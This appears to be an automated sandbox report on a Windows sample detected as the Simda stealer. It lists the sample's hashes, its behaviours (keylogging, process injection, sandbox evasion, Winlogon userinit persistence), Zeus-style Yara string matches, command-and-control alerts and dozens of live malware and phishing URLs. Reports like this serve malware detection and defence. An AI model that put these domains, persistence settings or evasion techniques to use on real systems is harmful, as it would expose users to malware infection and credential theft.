Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OjKmJJm2YT.exe

Overview

General Information

Sample name:OjKmJJm2YT.exe
renamed because original name is a hash value
Original sample name:Virus.Hijack.ATA_virussign.com_ca30350fdb8b854abac0a08aa08ff89a.exe
Analysis ID:1507240
MD5:ca30350fdb8b854abac0a08aa08ff89a
SHA1:1204292ab1abc758ebfb9bf6d452b960eb6d977a
SHA256:b1242f3aa475d93a247673616478365f3a7f9fb1edbe8075372a09455521a57d
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OjKmJJm2YT.exe (PID: 1956 cmdline: "C:\Users\user\Desktop\OjKmJJm2YT.exe" MD5: CA30350FDB8B854ABAC0A08AA08FF89A)
    • svchost.exe (PID: 1512 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 3AFDB594A34F95485CA05A57DFEF80CC)
      • nFjEHtbDTFjy.exe (PID: 5368 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 6928 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 3816 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7904 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 4976 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7960 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nFjEHtbDTFjy.exe (PID: 6472 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 3132 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 2316 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 7132 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 896 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 7144 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 5684 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 6424 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 6204 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 824 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nFjEHtbDTFjy.exe (PID: 4612 cmdline: "C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1734478353.00000000037F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1743033227.00000000037F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1680369624.00000000037F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x4b260:$a1: name=%s&port=%u
  • 0x4a9f8:$a2: data_inject
  • 0x4abe4:$a3: keylog.txt
  • 0x4a88d:$a4: User-agent: %s]]]
  • 0x4b3b4:$a5: %s\%02d.bmp
Click to see the 92 entries
SourceRuleDescriptionAuthorStrings
0.2.OjKmJJm2YT.exe.406400.0.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
2.3.svchost.exe.37f0000.13.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.883000.0.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x4e260:$a1: name=%s&port=%u
  • 0x4d9f8:$a2: data_inject
  • 0x4dbe4:$a3: keylog.txt
  • 0x4d88d:$a4: User-agent: %s]]]
  • 0x4e3b4:$a5: %s\%02d.bmp
2.3.svchost.exe.37f0000.41.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
24.2.nFjEHtbDTFjy.exe.d92000.1.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Click to see the 164 entries

System Summary

barindex
Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\OjKmJJm2YT.exe, ProcessId: 1956, TargetFilename: C:\Windows\apppatch\svchost.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OjKmJJm2YT.exe", ParentImage: C:\Users\user\Desktop\OjKmJJm2YT.exe, ParentProcessId: 1956, ParentProcessName: OjKmJJm2YT.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1512, ProcessName: svchost.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 1512, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OjKmJJm2YT.exe", ParentImage: C:\Users\user\Desktop\OjKmJJm2YT.exe, ParentProcessId: 1956, ParentProcessName: OjKmJJm2YT.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1512, ProcessName: svchost.exe
Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OjKmJJm2YT.exe", ParentImage: C:\Users\user\Desktop\OjKmJJm2YT.exe, ParentProcessId: 1956, ParentProcessName: OjKmJJm2YT.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1512, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-08T10:52:34.953925+020020181411A Network Trojan was detected44.221.84.10580192.168.2.949709TCP
2024-09-08T10:52:34.953983+020020181411A Network Trojan was detected18.208.156.24880192.168.2.949710TCP
2024-09-08T10:52:35.347950+020020181411A Network Trojan was detected3.94.10.3480192.168.2.949714TCP
2024-09-08T10:53:45.930055+020020181411A Network Trojan was detected52.34.198.22980192.168.2.963310TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-08T10:52:34.953925+020020377711A Network Trojan was detected44.221.84.10580192.168.2.949709TCP
2024-09-08T10:52:34.953983+020020377711A Network Trojan was detected18.208.156.24880192.168.2.949710TCP
2024-09-08T10:52:35.347950+020020377711A Network Trojan was detected3.94.10.3480192.168.2.949714TCP
2024-09-08T10:53:45.930055+020020377711A Network Trojan was detected52.34.198.22980192.168.2.963310TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-08T10:52:34.235689+020020210221A Network Trojan was detected1.1.1.153192.168.2.965460UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-08T10:52:34.901041+020028048521Malware Command and Control Activity Detected192.168.2.94970944.221.84.10580TCP
2024-09-08T10:52:34.935398+020028048521Malware Command and Control Activity Detected192.168.2.94971018.208.156.24880TCP
2024-09-08T10:52:35.077856+020028048521Malware Command and Control Activity Detected192.168.2.949707188.114.96.380TCP
2024-09-08T10:52:35.160440+020028048521Malware Command and Control Activity Detected192.168.2.949708162.255.119.10280TCP
2024-09-08T10:52:35.218120+020028048521Malware Command and Control Activity Detected192.168.2.94971344.221.84.10580TCP
2024-09-08T10:52:35.340682+020028048521Malware Command and Control Activity Detected192.168.2.9497143.94.10.3480TCP
2024-09-08T10:52:35.348821+020028048521Malware Command and Control Activity Detected192.168.2.949715208.100.26.24580TCP
2024-09-08T10:52:35.466063+020028048521Malware Command and Control Activity Detected192.168.2.949715208.100.26.24580TCP
2024-09-08T10:52:35.489762+020028048521Malware Command and Control Activity Detected192.168.2.94971869.162.80.5580TCP
2024-09-08T10:52:35.993021+020028048521Malware Command and Control Activity Detected192.168.2.949719154.212.231.8280TCP
2024-09-08T10:52:36.043383+020028048521Malware Command and Control Activity Detected192.168.2.94972191.195.240.1980TCP
2024-09-08T10:52:36.406724+020028048521Malware Command and Control Activity Detected192.168.2.949719154.212.231.8280TCP
2024-09-08T10:52:36.987522+020028048521Malware Command and Control Activity Detected192.168.2.949720188.114.96.3443TCP
2024-09-08T10:52:37.784848+020028048521Malware Command and Control Activity Detected192.168.2.949707188.114.96.380TCP
2024-09-08T10:52:39.354524+020028048521Malware Command and Control Activity Detected192.168.2.949722188.114.96.3443TCP
2024-09-08T10:52:55.915332+020028048521Malware Command and Control Activity Detected192.168.2.9497113.64.163.5080TCP
2024-09-08T10:52:55.927081+020028048521Malware Command and Control Activity Detected192.168.2.9497123.64.163.5080TCP
2024-09-08T10:52:56.243459+020028048521Malware Command and Control Activity Detected192.168.2.949716199.191.50.8380TCP
2024-09-08T10:52:56.567233+020028048521Malware Command and Control Activity Detected192.168.2.9497253.64.163.5080TCP
2024-09-08T10:53:05.537904+020028048521Malware Command and Control Activity Detected192.168.2.9497175.79.71.22580TCP
2024-09-08T10:53:17.287065+020028048521Malware Command and Control Activity Detected192.168.2.9497243.64.163.5080TCP
2024-09-08T10:53:17.614957+020028048521Malware Command and Control Activity Detected192.168.2.949726199.191.50.8380TCP
2024-09-08T10:53:18.206596+020028048521Malware Command and Control Activity Detected192.168.2.94974213.248.169.4880TCP
2024-09-08T10:53:18.390526+020028048521Malware Command and Control Activity Detected192.168.2.94974418.208.156.24880TCP
2024-09-08T10:53:18.503660+020028048521Malware Command and Control Activity Detected192.168.2.949743188.114.96.380TCP
2024-09-08T10:53:19.674486+020028048521Malware Command and Control Activity Detected192.168.2.949745103.150.11.23080TCP
2024-09-08T10:53:20.317081+020028048521Malware Command and Control Activity Detected192.168.2.949746188.114.96.3443TCP
2024-09-08T10:53:20.759479+020028048521Malware Command and Control Activity Detected192.168.2.949743188.114.96.380TCP
2024-09-08T10:53:22.337908+020028048521Malware Command and Control Activity Detected192.168.2.949748188.114.96.3443TCP
2024-09-08T10:53:27.240511+020028048521Malware Command and Control Activity Detected192.168.2.949745103.150.11.23080TCP
2024-09-08T10:53:28.727515+020028048521Malware Command and Control Activity Detected192.168.2.94975064.225.91.7380TCP
2024-09-08T10:53:28.777279+020028048521Malware Command and Control Activity Detected192.168.2.94975244.221.84.10580TCP
2024-09-08T10:53:29.136128+020028048521Malware Command and Control Activity Detected192.168.2.949751154.85.183.5080TCP
2024-09-08T10:53:29.450110+020028048521Malware Command and Control Activity Detected192.168.2.949751154.85.183.5080TCP
2024-09-08T10:53:33.475195+020028048521Malware Command and Control Activity Detected192.168.2.960798103.224.212.10880TCP
2024-09-08T10:53:34.223108+020028048521Malware Command and Control Activity Detected192.168.2.96079915.197.240.2080TCP
2024-09-08T10:53:35.033352+020028048521Malware Command and Control Activity Detected192.168.2.960800103.224.182.25280TCP
2024-09-08T10:53:39.253543+020028048521Malware Command and Control Activity Detected192.168.2.96330764.225.91.7380TCP
2024-09-08T10:53:39.507371+020028048521Malware Command and Control Activity Detected192.168.2.96330872.52.179.17480TCP
2024-09-08T10:53:40.017636+020028048521Malware Command and Control Activity Detected192.168.2.96330972.52.179.17480TCP
2024-09-08T10:53:45.922151+020028048521Malware Command and Control Activity Detected192.168.2.96331052.34.198.22980TCP
2024-09-08T10:53:49.707995+020028048521Malware Command and Control Activity Detected192.168.2.96331144.221.84.10580TCP
2024-09-08T10:53:52.790598+020028048521Malware Command and Control Activity Detected192.168.2.95733469.162.80.5580TCP
2024-09-08T10:53:52.821404+020028048521Malware Command and Control Activity Detected192.168.2.957338208.100.26.24580TCP
2024-09-08T10:53:52.964495+020028048521Malware Command and Control Activity Detected192.168.2.9573403.64.163.5080TCP
2024-09-08T10:53:52.970656+020028048521Malware Command and Control Activity Detected192.168.2.957338208.100.26.24580TCP
2024-09-08T10:53:53.076727+020028048521Malware Command and Control Activity Detected192.168.2.957341162.255.119.10280TCP
2024-09-08T10:53:53.286145+020028048521Malware Command and Control Activity Detected192.168.2.957337154.212.231.8280TCP
2024-09-08T10:53:53.532245+020028048521Malware Command and Control Activity Detected192.168.2.957339188.114.96.380TCP
2024-09-08T10:53:54.036670+020028048521Malware Command and Control Activity Detected192.168.2.95734291.195.240.1980TCP
2024-09-08T10:53:54.166237+020028048521Malware Command and Control Activity Detected192.168.2.9573403.64.163.5080TCP
2024-09-08T10:53:54.374430+020028048521Malware Command and Control Activity Detected192.168.2.957337154.212.231.8280TCP
2024-09-08T10:53:55.450639+020028048521Malware Command and Control Activity Detected192.168.2.957343188.114.96.3443TCP
2024-09-08T10:53:56.261258+020028048521Malware Command and Control Activity Detected192.168.2.957339188.114.96.380TCP
2024-09-08T10:53:57.836691+020028048521Malware Command and Control Activity Detected192.168.2.957344188.114.96.3443TCP
2024-09-08T10:54:00.277867+020028048521Malware Command and Control Activity Detected192.168.2.957335199.191.50.8380TCP
2024-09-08T10:54:00.277979+020028048521Malware Command and Control Activity Detected192.168.2.9573363.64.163.5080TCP
2024-09-08T10:54:03.918096+020028048521Malware Command and Control Activity Detected192.168.2.9573463.64.163.5080TCP
2024-09-08T10:54:04.290312+020028048521Malware Command and Control Activity Detected192.168.2.957345199.191.50.8380TCP
2024-09-08T10:54:05.110908+020028048521Malware Command and Control Activity Detected192.168.2.957347188.114.96.380TCP
2024-09-08T10:54:05.958281+020028048521Malware Command and Control Activity Detected192.168.2.957348103.150.11.23080TCP
2024-09-08T10:54:07.384794+020028048521Malware Command and Control Activity Detected192.168.2.957350188.114.96.3443TCP
2024-09-08T10:54:07.728326+020028048521Malware Command and Control Activity Detected192.168.2.957347188.114.96.380TCP
2024-09-08T10:54:09.400631+020028048521Malware Command and Control Activity Detected192.168.2.957351188.114.96.3443TCP
2024-09-08T10:54:11.965932+020028048521Malware Command and Control Activity Detected192.168.2.957348103.150.11.23080TCP
2024-09-08T10:54:12.974968+020028048521Malware Command and Control Activity Detected192.168.2.957352103.224.212.10880TCP
2024-09-08T10:54:13.157273+020028048521Malware Command and Control Activity Detected192.168.2.957353103.224.182.25280TCP
2024-09-08T10:54:13.490356+020028048521Malware Command and Control Activity Detected192.168.2.957354154.85.183.5080TCP
2024-09-08T10:54:14.230499+020028048521Malware Command and Control Activity Detected192.168.2.957354154.85.183.5080TCP
2024-09-08T10:54:17.755314+020028048521Malware Command and Control Activity Detected192.168.2.95705472.52.179.17480TCP
2024-09-08T10:54:18.271431+020028048521Malware Command and Control Activity Detected192.168.2.95705572.52.179.17480TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: OjKmJJm2YT.exeAvira: detected
Source: http://vojygut.com/http://gahyfyz.com/http://vopycom.com/http://lyvywed.com/http://vopycom.com/http:Avira URL Cloud: Label: phishing
Source: http://vopycom.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyryq.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojyjyc.com/login.phpAvira URL Cloud: Label: phishing
Source: http://galyvuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumyjig.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopyret.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lyvywed.com/http://gadyveb.com/http://lygyfex.com/http://gadyveb.com/Avira URL Cloud: Label: malware
Source: http://vofypuk.com/pAvira URL Cloud: Label: malware
Source: http://lygyxun.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvymej.com/login.phpAvira URL Cloud: Label: phishing
Source: http://vojygok.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qekyvup.com/login.phpAvira URL Cloud: Label: malware
Source: http://ganydeh.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetykyq.com/login.phpAvira URL Cloud: Label: phishing
Source: http://vofypam.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qetyvil.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatykyh.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetynev.com/login.phpAvira URL Cloud: Label: phishing
Source: http://vocyrom.com/http://gahyhys.com/http://gahyhys.com/http://qegyhev.com/http://purycul.com/http:Avira URL Cloud: Label: malware
Source: http://qegyval.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacycaz.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lyvymir.com/login.phpAvira URL Cloud: Label: malware
Source: http://ganykaz.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygyvuj.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qeqyxyp.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qegyfyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://ganypeb.com/login.phpcAvira URL Cloud: Label: malware
Source: http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9ehttp://ww16.vofycot.com/lAvira URL Cloud: Label: malware
Source: http://lyxyxox.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qekyvav.com/login.phpAvira URL Cloud: Label: malware
Source: http://lymywaj.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyfyj.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacynuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzyduq.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzydal.com/login.phpAvira URL Cloud: Label: malware
Source: https://qegyhig.com/wp-json/Avira URL Cloud: Label: malware
Source: http://gatyfus.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojycec.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lyxyfar.com/pAvira URL Cloud: Label: malware
Source: http://gahypus.com/login.phpcom/login.phpAvira URL Cloud: Label: malware
Source: http://volydot.com/login.phpAvira URL Cloud: Label: phishing
Source: http://pujydap.com/login.phpAvira URL Cloud: Label: malware
Source: http://pujydap.com/http://ganykah.com/http://volygyt.com/http://pupyxuq.com/http://pupyxuq.com/Avira URL Cloud: Label: malware
Source: http://puzywel.com/Avira URL Cloud: Label: malware
Source: C:\Windows\apppatch\svchost.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\apppatch\svchost.exeJoe Sandbox ML: detected
Source: OjKmJJm2YT.exeJoe Sandbox ML: detected

Compliance

barindex
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 5.2.nFjEHtbDTFjy.exe.690000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 21.2.nFjEHtbDTFjy.exe.2440000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 26.2.nFjEHtbDTFjy.exe.2490000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 30.2.nFjEHtbDTFjy.exe.2480000.2.unpack
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeUnpacked PE file: 0.2.OjKmJJm2YT.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: OjKmJJm2YT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49720 version: TLS 1.2
